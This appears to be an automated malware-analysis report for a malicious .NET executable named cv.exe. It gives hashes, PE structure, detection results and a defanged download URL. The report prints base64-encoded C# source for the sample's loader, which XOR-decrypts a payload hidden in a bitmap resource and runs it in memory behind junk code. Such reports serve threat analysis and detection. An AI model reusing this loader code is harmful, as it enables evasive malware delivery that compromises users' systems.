MalScore
100/100

cv.exe

Is DLL Packer Anti Debug Anti VM Signed XOR AntiVirus 26/67 Related 2258
File details Download PDF Report
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 295.50 KB (302592 bytes)
Compile time: 2018-04-26 20:24:02
MD5: e8a1026d6d025f281c596870fc1185ad
SHA1: 28e9f6bd76e161dab22829b3bff2af740de05ab1
SHA256: 33c50b2ae8165306ced86dd1dc8e97aef377d1cb4b1297dec91940489a580d6d
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744
Sections 3 .text .rsrc .reloc
Directories 3 import resource relocation
First submission: 2018-04-27 14:09:07
Last submission: 2018-04-27 14:09:07
Filename detected: - cv.exe (1)
URL file hosting
hXXp://198.46.235.194/cv.exeVirusTotal
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-04-27 05:07:21 [26/67] VirusTotal
PE Sections 2 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x2000 0x51e4 20992 afb41a7bfe9ef258450fcce594a7caa0 7c1a9443aafbbebb0fd2b893b177dae7c0450b5b
.rsrc 0x8000 0x446b2 280576 46237818f08a8ed24e999877ce02a56b 84299ff03726a206d87195b3b64a83f749cd692a
.reloc 0x4e000 0xc 512 27ad6e1b2236490b65c0215a43dca11d b9ae0172d30bc0b8462c07366280c3468d268b24
PE Resources
Name Offset Size Language Sublanguage Data
RT_ICON 0x8a50 1384 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_GROUP_ICON 0x8fb8 34 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_VERSION 0x8fdc 652 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_HTML 0x9268 275039 LANG_GERMAN SUBLANG_GERMAN
RT_MANIFEST 0x4c4c8 490 LANG_NEUTRAL SUBLANG_NEUTRAL
  • API Alert
  • Anti Debug
Meta Info
LegalCopyright:
Assembly Version: 0.0.0.0
InternalName: SZFexGReTFuyOUaW.Program.exe
FileVersion: 0.0.0.0
FileDescription:
Translation: 0x0000 0x04b0
OriginalFilename: SZFexGReTFuyOUaW.Program.exe
ProductVersion: 0.0.0.0
XOR
No XOR informations found in this file.
Signature
This file isn't digitally signed
Packer(s)
Microsoft Visual C# / Basic .NET
Microsoft Visual Studio .NET
.NET executable
Microsoft Visual C# v7.0 / Basic .NET
File found
FIle type: Library
mscoree.dll
IP Found
No IP detected
URL(s)
No URL found
String too long
dXNpbmcgU3lzdGVtOw0KdXNpbmcgU3lzdGVtLklPOw0KdXNpbmcgU3lzdGVtLlRleHQ7DQp1c2luZyBTeXN0ZW0uUmVmbGVjdGlvbjsNCnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7DQp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7DQp1c2luZyBTeXN0ZW0uRHJhd2luZzsNCg0KbmFtZXNwYWNlIE96S0VaQk9ucWVCZw0Kew0KCXB1YmxpYyBjbGFzcyBPYUV7cHVibGljIHZvaWQgeWJhKCl7DQpieXRlIGhMaCA9ICAxNjk7IAogRW52aXJvbm1lbnQuRXhpdCgwKTtsb25nIEViRyA9IDUzNTA1NDU2NzM0MDM5MDkzOyAKc2hvcnQgTlBtID0gLTEzOTg5OyAKIGJ5dGVbXSBOUG1OUG0gPSBTeXN0ZW0uSU8uRmlsZS5SZWFkQWxsQnl0ZXMoIk5QbSIpOw0KfXB1YmxpYyB2b2lkIE92bCgpew0KYnl0ZSB5SHUgPSAgMjUyOyAKIEVudmlyb25tZW50LkV4aXQoMCk7c2hvcnQgS2ZzID0gLTI5MDAwOyAKIGJ5dGVbXSBLZnNLZnMgPSBTeXN0ZW0uSU8uRmlsZS5SZWFkQWxsQnl0ZXMoIktmcyIpO3VpbnQgUk9iID0gNzg2NTYwMDY7IAoNCn1wdWJsaWMgdm9pZCBUalEoKXsNCnVpbnQgYk9CID0gODkwMzMwODE0OyAKdWxvbmcgRk9VID0gNjQ4MDQ2MzUxMTI1MDIyMzA7IApmbG9hdCBBc0ogPSA2LjAzMTk3NkUrMjNGOyAKDQp9Cn0gcHVibGljIGNsYXNzIG5NVHtwdWJsaWMgdm9pZCB2Z1coKXsNCmRvdWJsZSBZTUcgPSAyLjU4NTI5NEUtMjA7IApZTUcgPSBNYXRoLlBvdyg1LCAyKTsNCnRyeXsNCmludCBIUlVJbEZyVXJSID0gNDQwMjQzNjsNCmlmKEhSVUlsRnJVclIgPT0gMzQxNTMpew0KSFJVSWxGclVyUisrOw0KfWVsc2V7DQpIUlVJbEZyVXJSLS07DQp9DQp9Y2F0Y2goRXhjZXB0aW9uIGV4KXsNCg0KfXVsb25nIE10dSA9IDM3NTUwNDcxNTE1MTg5NTEyOyAKaW50IFBxUyA9IDQ3NjQ3ODg3OyAKaWYoUHFTID09IDIyOTA3NCl7DQpQcVMgPSBQcVMgKyAxMzExNTc7DQp9DQp9cHVibGljIHZvaWQgYWRjKCl7DQppbnQgSUZiID0gOTU4MTA5OyAKaWYoSUZiID09IDkyMDMpew0KSUZiICs9IDc0NTk1MjsNCn1ieXRlIGpiciA9ICAxMTg7IAogRW52aXJvbm1lbnQuRXhpdCgwKTtzYnl0ZSBHT1AgPSAgLTg7IAogQ29uc29sZS5SZWFkTGluZSgpOw0KfXB1YmxpYyB2b2lkIEdKbSgpew0Kc3RyaW5nIGJaUCA9ICJ2SGsiOyAKIENvbnNvbGUuV3JpdGVMaW5lKGJaUCk7c2J5dGUgUmd0ID0gIDMxOyAKIENvbnNvbGUuUmVhZExpbmUoKTtzaG9ydCBTTnogPSA3NTE5OyAKIGJ5dGVbXSBTTnpTTnogPSBTeXN0ZW0uSU8uRmlsZS5SZWFkQWxsQnl0ZXMoIlNOeiIpOw0KfQp9IHB1YmxpYyBjbGFzcyB0SWp7cHVibGljIHZvaWQgeGhRKCl7DQpzYnl0ZSBKeWYgPSAgMTAwOyAKIENvbnNvbGUuUmVhZExpbmUoKTtzaG9ydCBJQ3UgPSA4NDkyOyAKIGJ5dGVbXSBJQ3VJQ3UgPSBTeXN0ZW0uSU8uRmlsZS5SZWFkQWxsQnl0ZXMoIklDdSIpO3NieXRlIHNmSSA9ICA5MTsgCiBDb25zb2xlLlJlYWRMaW5lKCk7DQp9cHVibGljIHZvaWQgZ3hsKCl7DQpzaG9ydCBheG8gPSAtMTkxNjU7IAogYnl0ZVtdIGF4b2F4byA9IFN5c3RlbS5JTy5GaWxlLlJlYWRBbGxCeXRlcygiYXhvIik7bG9uZyBicmQgPSA1NTcxMzQwNDc1MzQxNDE5NjsgCnVpbnQgdE1RID0gMTA2MzI5MDM4OyAKDQp9cHVibGljIHZvaWQgeWxrKCl7DQpkb3VibGUgc1FTID0gMy4xMDMxMTZFKzI1OyAKaWYoc1FTID09IC02LjA5NTMzM0UtMzgpew0Kc1FTID0gTWF0aC5UcnVuY2F0ZShzUVMpOw0KDQp9ZmxvYXQgcVphID0gLTEuNDg4MjgzRS0zN0Y7IApsb25nIGdOQiA9IDUyOTM4NzIwMjg4MTE2NTc1OyAKDQp9Cn0gDQoNCiAgICBjbGFzcyBQcm9ncmFtDQogICAgew0KDQogICAgICAgIHN0YXRpYyBzdHJpbmcgeENzam50UXVoRkpSbSA9ICIjcGFzcyMiOw0KICAgICAgICBwcml2YXRlIHN0YXRpYyBieXRlW10gbElySHJoYihieXRlW10gYnl0ZXMpDQogICAgICAgIHsNCiAgICAgICAgICAgIGJ5dGVbXSBieXRlQXJyYXkgPSBFbmNvZGluZy5Vbmljb2RlLkdldEJ5dGVzKHhDc2pudFF1aEZKUm0pOw0KICAgICAgICAgICAgZm9yIChpbnQgaSA9IDA7IGkgPCBieXRlcy5MZW5ndGg7IGkrKykNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICBieXRlc1tpXSBePSBieXRlQXJyYXlbaSAlIDE2XTsNCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIHJldHVybiBieXRlczsNCiAgICAgICAgfQ0KCQkNCgkJcHJpdmF0ZSBzdGF0aWMgYnl0ZVtdIENvbnZlcnRGcm9tQm1wKFN5c3RlbS5EcmF3aW5nLkJpdG1hcCBiKQ0KICAgICAgICB7DQogICAgICAgICAgICBpbnQgbCA9IGIuV2lkdGg7DQogICAgICAgICAgICBpbnQgbiA9IGwgKiBsICogNDsNCiAgICAgICAgICAgIGJ5dGVbXSBidWZmID0gbmV3IGJ5dGVbbl07DQogICAgICAgICAgICBpbnQgayA9IDA7DQoNCiAgICAgICAgICAgIGZvciAoaW50IHggPSAwOyB4IDwgbDsgeCsrKQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgIGZvciAoaW50IHkgPSAwOyB5IDwgbDsgeSsrKQ0KICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgQnVmZmVyLkJsb2NrQ29weShCaXRDb252ZXJ0ZXIuR2V0Qnl0ZXMoYi5HZXRQaXhlbCh4LCB5KS5Ub0FyZ2IoKSksIDAsIGJ1ZmYsIGssIDQpOw0KICAgICAgICAgICAgICAgICAgICBrICs9IDQ7DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgfQ0KDQogICAgICAgICAgICBpbnQgbGVuID0gQml0Q29udmVydGVyLlRvSW50MzIoYnVmZiwgMCk7DQogICAgICAgICAgICBieXRlW10gZiA9IG5ldyBieXRlW2xlbl07DQogICAgICAgICAgICBCdWZmZXIuQmxvY2tDb3B5KGJ1ZmYsIDQsIGYsIDAsIGYuTGVuZ3RoKTsNCiAgICAgICAgICAgIHJldHVybiBmOw0KICAgICAgICB9DQoJCQ0KCQkNCgkJc3RhdGljIGJ5dGVbXSBnREhPQjsNCgkJcHVibGljIHN0YXRpYyB2b2lkIHFpZnlYR1Jvbkx2akRhdU8oKQ0KCQl7DQoJCQlBc3NlbWJseS5Mb2FkKGdESE9CKS5FbnRyeVBvaW50Lkludm9rZShudWxsLCBuZXcgb2JqZWN0W10geyBuZXcgc3RyaW5nW10geyB9IH0pOw0KCQl9DQoJCQ0KCQlbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiKV0NCgkJc3RhdGljIGV4dGVybiBJbnRQdHIgRmluZFJlc291cmNlKEludFB0ciBoTW9kdWxlLCBJbnRQdHIgbHBOYW1lLCBJbnRQdHIgbHBUeXBlKTsNCgkJDQoJCVtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIsIFNldExhc3RFcnJvcj10cnVlKV0NCgkJc3RhdGljIGV4dGVybiB1aW50IFNpemVvZlJlc291cmNlKEludFB0ciBoTW9kdWxlLCBJbnRQdHIgaFJlc0luZm8pOw0KCQkNCgkJW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQ0KCQlzdGF0aWMgZXh0ZXJuIEludFB0ciBMb2FkUmVzb3VyY2UoSW50UHRyIGhNb2R1bGUsIEludFB0ciBoUmVzSW5mbyk7DQoJCQ0KCQlbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiKV0NCgkJc3RhdGljIGV4dGVybiBJbnRQdHIgTG9ja1Jlc291cmNlKEludFB0ciBoUmVzRGF0YSk7DQoJCQ0KDQoJCXB1YmxpYyBzdGF0aWMgQml0bWFwIEJ5dGUySW1hZ2UoYnl0ZVtdIGltZykNCiAgICAgICAgew0KICAgICAgICAgICAgdXNpbmcgKHZhciBzdHJlYW0gPSBuZXcgTWVtb3J5U3RyZWFtKGltZykpDQogICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgcmV0dXJuIG5ldyBCaXRtYXAoc3RyZWFtKTsNCiAgICAgICAgICAgIH0NCiAgICAgICAgfQ0KCQkNCiAgICAgICAgc3RhdGljIHZvaWQgTWFpbigpDQogICAgICAgIHsNCiAgICAgICAgICAgIHRyeQ0KICAgICAgICAgICAgewkJDQoJCQkJSW50UHRyIGZSZXNvdXJjZSA9IEZpbmRSZXNvdXJjZShuZXcgSW50UHRyKDApLCBuZXcgSW50UHRyKDExNyksIG5ldyBJbnRQdHIoMjMpKTsNCgkJCQl1aW50IHNSZXNvdXJjZSA9IFNpemVvZlJlc291cmNlKG5ldyBJbnRQdHIoMCksIGZSZXNvdXJjZSk7DQoJCQkJSW50UHRyIGxSZXNvdXJjZSA9IExvYWRSZXNvdXJjZShuZXcgSW50UHRyKDApLCBmUmVzb3VyY2UpOw0KCQkJCUludFB0ciBkUmVzb3VyY2UgPSBMb2NrUmVzb3VyY2UobFJlc291cmNlKTsNCgkJCQkNCgkJCQlnREhPQiA9IG5ldyBieXRlW3NSZXNvdXJjZV07DQoJCQkJU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWwuQ29weShkUmVzb3VyY2UsIGdESE9CLCAwLCBTeXN0ZW0uQ29udmVydC5Ub0ludDMyKHNSZXNvdXJjZSkpOw0KCQkJCWdESE9CID0gbElySHJoYihDb252ZXJ0RnJvbUJtcChCeXRlMkltYWdlKGdESE9CKSkpOw0KCQkJCQ0KCQkJCVN5c3RlbS5UaHJlYWRpbmcuVGhyZWFkIHRociA9IG5ldyBTeXN0ZW0uVGhyZWFkaW5nLlRocmVhZChxaWZ5WEdSb25MdmpEYXVPKTsNCgkJCQl0aHIuU3RhcnQoKTsNCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIGNhdGNoDQogICAgICAgICAgICB7DQoNCiAgICAgICAgICAgIH0NCiAgICAgICAgfQ0KICAgIH0NCgkNCglwdWJsaWMgY2xhc3MgeWFse3B1YmxpYyB2b2lkIEFEZygpew0KYnl0ZSBrVmIgPSAgMTY5OyAKIEVudmlyb25tZW50LkV4aXQoMCk7bG9uZyBISVQgPSA1MzUwNTQ1NjczNDAzOTA5MzsgCnNob3J0IHZqaiA9IC0xMzk4OTsgCiBieXRlW10gdmpqdmpqID0gU3lzdGVtLklPLkZpbGUuUmVhZEFsbEJ5dGVzKCJ2amoiKTsNCn1wdWJsaWMgdm9pZCBRdHMoKXsNCmJ5dGUgWFRJID0gIDI1MjsgCiBFbnZpcm9ubWVudC5FeGl0KDApO3Nob3J0IHNlbiA9IC0yOTAwMDsgCiBieXRlW10gc2Vuc2VuID0gU3lzdGVtLklPLkZpbGUuUmVhZEFsbEJ5dGVzKCJzZW4iKTt1aW50IEZQQiA9IDc4NjU2MDA2OyAKDQp9cHVibGljIHZvaWQgekJKKCl7DQp1aW50IElnVCA9IDg5MDMzMDgxNDsgCnVsb25nIFBzeCA9IDY0ODA0NjM1MTEyNTAyMjMwOyAKZmxvYXQgaWdaID0gNi4wMzE5NzZFKzIzRjsgCg0KfQp9IHB1YmxpYyBjbGFzcyBmSGd7cHVibGljIHZvaWQgYUFDKCl7DQpkb3VibGUgR3FvID0gMi41ODUyOTRFLTIwOyAKR3FvID0gTWF0aC5Qb3coNSwgMik7DQp0cnl7DQppbnQgSkpZTXRrQWVmUiA9IDQ0MDI0MzY7DQppZihKSllNdGtBZWZSID09IDM0MTUzKXsNCkpKWU10a0FlZlIrKzsNCn1lbHNlew0KSkpZTXRrQWVmUi0tOw0KfQ0KfWNhdGNoKEV4Y2VwdGlvbiBleCl7DQoNCn11bG9uZyBHZ28gPSAzNzU1MDQ3MTUxNTE4OTUxMjsgCmludCBndEggPSA0NzY0Nzg4NzsgCmlmKGd0SCA9PSAyMjkwNzQpew0KZ3RIID0gZ3RIICsgMTMxMTU3Ow0KfQ0KfXB1YmxpYyB2b2lkIFdoZSgpew0KaW50IGlCaiA9IDk1ODEwOTsgCmlmKGlCaiA9PSA5MjAzKXsNCmlCaiArPSA3NDU5NTI7DQp9Ynl0ZSB2ZUEgPSAgMTE4OyAKIEVudmlyb25tZW50LkV4aXQoMCk7c2J5dGUgb1dDID0gIC04OyAKIENvbnNvbGUuUmVhZExpbmUoKTsNCn1wdWJsaWMgdm9pZCBwZUEoKXsNCnN0cmluZyBvR0QgPSAiREpJIjsgCiBDb25zb2xlLldyaXRlTGluZShvR0QpO3NieXRlIHBFQSA9ICAzMTsgCiBDb25zb2xlLlJlYWRMaW5lKCk7c2hvcnQgcUVGID0gNzUxOTsgCiBieXRlW10gcUVGcUVGID0gU3lzdGVtLklPLkZpbGUuUmVhZEFsbEJ5dGVzKCJxRUYiKTsNCn0KfSBwdWJsaWMgY2xhc3MgWnRse3B1YmxpYyB2b2lkIGVybygpew0Kc2J5dGUgUkdXID0gIDEwMDsgCiBDb25zb2xlLlJlYWRMaW5lKCk7c2hvcnQgTVFnID0gODQ5MjsgCiBieXRlW10gTVFnTVFnID0gU3lzdGVtLklPLkZpbGUuUmVhZEFsbEJ5dGVzKCJNUWciKTtzYnl0ZSBtekMgPSAgOTE7IAogQ29uc29sZS5SZWFkTGluZSgpOw0KfXB1YmxpYyB2b2lkIEpoTigpew0Kc2hvcnQgSWNDID0gLTE5MTY1OyAKIGJ5dGVbXSBJY0NJY0MgPSBTeXN0ZW0uSU8uRmlsZS5SZWFkQWxsQnl0ZXMoIkljQyIpO2xvbmcgc2hBID0gNTU3MTM0MDQ3NTM0MTQxOTY7IAp1aW50IFFCRyA9IDEwNjMyOTAzODsgCg0KfXB1YmxpYyB2b2lkIHRSWigpew0KZG91YmxlIFNLdyA9IDMuMTAzMTE2RSsyNTsgCmlmKFNLdyA9PSAtNi4wOTUzMzNFLTM4KXsNClNLdyA9IE1hdGguVHJ1bmNhdGUoU0t3KTsNCg0KfWZsb2F0IENEcCA9IC0xLjQ4ODI4M0UtMzdGOyAKbG9uZyBURmQgPSA1MjkzODcyMDI4ODExNjU3NTsgCg0KfQp9IA0KfQ==
VarFileInfo
BGL
eef2f
sKc
Sqy
HYd
MKa
lld.tnemeganaM.metsyS
MwB
2f212
ejz
StringFileInfo
Translation
exeniw:tegrat/ +gubed/ 68X:mroftalp/ +ezimitpo/
;Z|
Assembly Version
PmV
InternalName
FileVersion
VEP
Fsg
VS_VERSION_INFO
BLP
IWzcHzBLigoT
lld.gniwarD.metsyS
000004b0
SZFexGReTFuyOUaW.Program.exe
ProductVersion
YEePvWgyboeH
FileDescription
lld.eroC.metsyS
0.0.0.0
OriginalFilename
KdS
LegalCopyright
Fqz
oxz
xXz
dXNpbmcgU3lzdGVtOw0KdXNpbmcgU3lzdGVtLklPOw0KdXNpbmcgU3lzdGVtLlRleHQ7DQp1c2luZyBTeXN0ZW0uUmVmbGVjdGlvbjsNCnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7DQp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7DQp1c2luZyBTeXN0ZW0uRHJhd2luZzsNCg0KbmFtZXNwYWNlIE96S0VaQk9ucWVCZw0Kew0KCXB1YmxpYyBjbGFzcyBPYUV7cHVibGljIHZvaWQgeWJhKCl7DQpieXRlIGhMaCA9ICAxNjk7IAogRW52aXJvbm1lbnQuRXhpdCgwKTtsb25nIEViRyA9IDUzNTA1NDU2NzM0MDM5MDkzOyAKc2hvcnQgTlBtID0gLTEzOTg5OyAKIGJ5dGVbXSBOUG1OUG0gPSBTeXN0ZW0uSU8uRmlsZS5SZWFkQWxsQnl0ZXMoIk5QbSIpOw0KfXB1YmxpYyB2b2lkIE92bCgpew0KYnl0ZSB5SHUgPSAgMjUyOyAKIEVudmlyb25tZW50LkV4aXQoMCk7c2hvcnQgS2ZzID0gLTI5MDAwOyAKIGJ5dGVbXSBLZnNLZnMgPSBTeXN0ZW0uSU8uRmlsZS5SZWFkQWxsQnl0ZXMoIktmcyIpO3VpbnQgUk9iID0gNzg2NTYwMDY7IAoNCn1wdWJsaWMgdm9pZCBUalEoKXsNCnVpbnQgYk9CID0gODkwMzMwODE0OyAKdWxvbmcgRk9VID0gNjQ4MDQ2MzUxMTI1MDIyMzA7IApmbG9hdCBBc0ogPSA2LjAzMTk3NkUrMjNGOyAKDQp9Cn0gcHVibGljIGNsYXNzIG5NVHtwdWJsaWMgdm9pZCB2Z1coKXsNCmRvdWJsZSBZTUcgPSAyLjU4NTI5NEUtMjA7IApZTUcgPSBNYXRoLlBvdyg1LCAyKTsNCnRyeXsNCmludCBIUlVJbEZyVXJSID0gNDQwMjQzNjsNCmlmKEhSVUlsRnJVclIgPT0gMzQxNTMpew0KSFJVSWxGclVyUisrOw0KfWVsc2V7DQpIUlVJbEZyVXJSLS07DQp9DQp9Y2F0Y2goRXhjZXB0aW9uIGV4KXsNCg0KfXVsb25nIE10dSA9IDM3NTUwNDcxNTE1MTg5NTEyOyAKaW50IFBxUyA9IDQ3NjQ3ODg3OyAKaWYoUHFTID09IDIyOTA3NCl7DQpQcVMgPSBQcVMgKyAxMzExNTc7DQp9DQp9cHVibGljIHZvaWQgYWRjKCl7DQppbnQgSUZiID0gOTU4MTA5OyAKaWYoSUZiID09IDkyMDMpew0KSUZiICs9IDc0NTk1MjsNCn1ieXRlIGpiciA9ICAxMTg7IAogRW52aXJvbm1lbnQuRXhpdCgwKTtzYnl0ZSBHT1AgPSAgLTg7IAogQ29uc29sZS5SZWFkTGluZSgpOw0KfXB1YmxpYyB2b2lkIEdKbSgpew0Kc3RyaW5nIGJaUCA9ICJ2SGsiOyAKIENvbnNvbGUuV3JpdGVMaW5lKGJaUCk7c2J5dGUgUmd0ID0gIDMxOyAKIENvbnNvbGUuUmVhZExpbmUoKTtzaG9ydCBTTnogPSA3NTE5OyAKIGJ5dGVbXSBTTnpTTnogPSBTeXN0ZW0uSU8uRmlsZS5SZWFkQWxsQnl0ZXMoIlNOeiIpOw0KfQp9IHB1YmxpYyBjbGFzcyB0SWp7cHVibGljIHZvaWQgeGhRKCl7DQpzYnl0ZSBKeWYgPSAgMTAwOyAKIENvbnNvbGUuUmVhZExpbmUoKTtzaG9ydCBJQ3UgPSA4NDkyOyAKIGJ5dGVbXSBJQ3VJQ3UgPSBTeXN0ZW0uSU8uRmlsZS5SZWFkQWxsQnl0ZXMoIklDdSIpO3NieXRlIHNmSSA9ICA5MTsgCiBDb25zb2xlLlJlYWRMaW5lKCk7DQp9cHVibGljIHZvaWQgZ3hsKCl7DQpzaG9ydCBheG8gPSAtMTkxNjU7IAogYnl0ZVtdIGF4b2F4byA9IFN5c3RlbS5JTy5GaWxlLlJlYWRBbGxCeXRlcygiYXhvIik7bG9uZyBicmQgPSA1NTcxMzQwNDc1MzQxNDE5NjsgCnVpbnQgdE1RID0gMTA2MzI5MDM4OyAKDQp9cHVibGljIHZvaWQgeWxrKCl7DQpkb3VibGUgc1FTID0gMy4xMDMxMTZFKzI1OyAKaWYoc1FTID09IC02LjA5NTMzM0UtMzgpew0Kc1FTID0gTWF0aC5UcnVuY2F0ZShzUVMpOw0KDQp9ZmxvYXQgcVphID0gLTEuNDg4MjgzRS0zN0Y7IApsb25nIGdOQiA9IDUyOTM4NzIwMjg4MTE2NTc1OyAKDQp9Cn0gDQoNCiAgICBjbGFzcyBQcm9ncmFtDQogICAgew0KDQogICAgICAgIHN0YXRpYyBzdHJpbmcgeENzam50UXVoRkpSbSA9ICIjcGFzcyMiOw0KICAgICAgICBwcml2YXRlIHN0YXRpYyBieXRlW10gbElySHJoYihieXRlW10gYnl0ZXMpDQogICAgICAgIHsNCiAgICAgICAgICAgIGJ5dGVbXSBieXRlQXJyYXkgPSBFbmNvZGluZy5Vbmljb2RlLkdldEJ5dGVzKHhDc2pudFF1aEZKUm0pOw0KICAgICAgICAgICAgZm9yIChpbnQgaSA9IDA7IGkgPCBieXRlcy5MZW5ndGg7IGkrKykNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICBieXRlc1tpXSBePSBieXRlQXJyYXlbaSAlIDE2XTsNCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIHJldHVybiBieXRlczsNCiAgICAgICAgfQ0KCQkNCgkJcHJpdmF0ZSBzdGF0aWMgYnl0ZVtdIENvbnZlcnRGcm9tQm1wKFN5c3RlbS5EcmF3aW5nLkJpdG1hcCBiKQ0KICAgICAgICB7DQogICAgICAgICAgICBpbnQgbCA9IGIuV2lkdGg7DQogICAgICAgICAgICBpbnQgbiA9IGwgKiBsICogNDsNCiAgICAgICAgICAgIGJ5dGVbXSBidWZmID0gbmV3IGJ5dGVbbl07DQogICAgICAgICAgICBpbnQgayA9IDA7DQoNCiAgICAgICAgICAgIGZvciAoaW50IHggPSAwOyB4IDwgbDsgeCsrKQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgIGZvciAoaW50IHkgPSAwOyB5IDwgbDsgeSsrKQ0KICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgQnVmZmVyLkJsb2NrQ29weShCaXRDb252ZXJ0ZXIuR2V0Qnl0ZXMoYi5HZXRQaXhlbCh4LCB5KS5Ub0FyZ2IoKSksIDAsIGJ1ZmYsIGssIDQpOw0KICAgICAgICAgICAgICAgICAgICBrICs9IDQ7DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgfQ0KDQogICAgICAgICAgICBpbnQgbGVuID0gQml0Q29udmVydGVyLlRvSW50MzIoYnVmZiwgMCk7DQogICAgICAgICAgICBieXRlW10gZiA9IG5ldyBieXRlW2xlbl07DQogICAgICAgICAgICBCdWZmZXIuQmxvY2tDb3B5KGJ1ZmYsIDQsIGYsIDAsIGYuTGVuZ3RoKTsNCiAgICAgICAgICAgIHJldHVybiBmOw0KICAgICAgICB9DQoJCQ0KCQkNCgkJc3RhdGljIGJ5dGVbXSBnREhPQjsNCgkJcHVibGljIHN0YXRpYyB2b2lkIHFpZnlYR1Jvbkx2akRhdU8oKQ0KCQl7DQoJCQlBc3NlbWJseS5Mb2FkKGdESE9CKS5FbnRyeVBvaW50Lkludm9rZShudWxsLCBuZXcgb2JqZWN0W10geyBuZXcgc3RyaW5nW10geyB9IH0pOw0KCQl9DQoJCQ0KCQlbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiKV0NCgkJc3RhdGljIGV4dGVybiBJbnRQdHIgRmluZFJlc291cmNlKEludFB0ciBoTW9kdWxlLCBJbnRQdHIgbHBOYW1lLCBJbnRQdHIgbHBUeXBlKTsNCgkJDQoJCVtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIsIFNldExhc3RFcnJvcj10cnVlKV0NCgkJc3RhdGljIGV4dGVybiB1aW50IFNpemVvZlJlc291cmNlKEludFB0ciBoTW9kdWxlLCBJbnRQdHIgaFJlc0luZm8pOw0KCQkNCgkJW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQ0KCQlzdGF0aWMgZXh0ZXJuIEludFB0ciBMb2FkUmVzb3VyY2UoSW50UHRyIGhNb2R1bGUsIEludFB0ciBoUmVzSW5mbyk7DQoJCQ0KCQlbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiKV0NCgkJc3RhdGljIGV4dGVybiBJbnRQdHIgTG9ja1Jlc291cmNlKEludFB0ciBoUmVzRGF0YSk7DQoJCQ0KDQoJCXB1YmxpYyBzdGF0aWMgQml0bWFwIEJ5dGUySW1hZ2UoYnl0ZVtdIGltZykNCiAgICAgICAgew0KICAgICAgICAgICAgdXNpbmcgKHZhciBzdHJlYW0gPSBuZXcgTWVtb3J5U3RyZWFtKGltZykpDQogICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgcmV0dXJuIG5ldyBCaXRtYXAoc3RyZWFtKTsNCiAgICAgICAgICAgIH0NCiAgICAgICAgfQ0KCQkNCiAgICAgICAgc3RhdGljIHZvaWQgTWFpbigpDQogICAgICAgIHsNCiAgICAgICAgICAgIHRyeQ0KICAgICAgICAgICAgewkJDQoJCQkJSW50UHRyIGZSZXNvdXJjZSA9IEZpbmRSZXNvdXJjZShuZXcgSW50UHRyKDApLCBuZXcgSW50UHRyKDExNyksIG5ldyBJbnRQdHIoMjMpKTsNCgkJCQl1aW50IHNSZXNvdXJjZSA9IFNpemVvZlJlc291cmNlKG5ldyBJbnRQdHIoMCksIGZSZXNvdXJjZSk7DQoJCQkJSW50UHRyIGxSZXNvdXJjZSA9IExvYWRSZXNvdXJjZShuZXcgSW50UHRyKDApLCBmUmVzb3VyY2UpOw0KCQkJCUludFB0ciBkUmVzb3VyY2UgPSBMb2NrUmVzb3VyY2UobFJlc291cmNlKTsNCgkJCQkNCgkJCQlnREhPQiA9IG5ldyBieXRlW3NSZXNvdXJjZV07DQoJCQkJU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWwuQ29weShkUmVzb3VyY2UsIGdESE9CLCAwLCBTeXN0ZW0uQ29udmVydC5Ub0ludDMyKHNSZXNvdXJjZSkpOw0KCQkJCWdESE9CID0gbElySHJoYihDb252ZXJ0RnJvbUJtcChCeXRlMkltYWdlKGdESE9CKSkpOw0KCQkJCQ0KCQkJCVN5c3RlbS5UaHJlYWRpbmcuVGhyZWFkIHRociA9IG5ldyBTeXN0ZW0uVGhyZWFkaW5nLlRocmVhZChxaWZ5WEdSb25MdmpEYXVPKTsNCgkJCQl0aHIuU3RhcnQoKTsNCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIGNhdGNoDQogICAgICAgICAgICB7DQoNCiAgICAgICAgICAgIH0NCiAgICAgICAgfQ0KICAgIH0NCgkNCglwdWJsaWMgY2xhc3MgeWFse3B1YmxpYyB2b2lkIEFEZygpew0KYnl0ZSBrVmIgPSAgMTY5OyAKIEVudmlyb25tZW50LkV4aXQoMCk7bG9uZyBISVQgPSA1MzUwNTQ1NjczNDAzOTA5MzsgCnNob3J0IHZqaiA9IC0xMzk4OTsgCiBieXRlW10gdmpqdmpqID0gU3lzdGVtLklPLkZpbGUuUmVhZEFsbEJ5dGVzKCJ2amoiKTsNCn1wdWJsaWMgdm9pZCBRdHMoKXsNCmJ5dGUgWFRJID0gIDI1M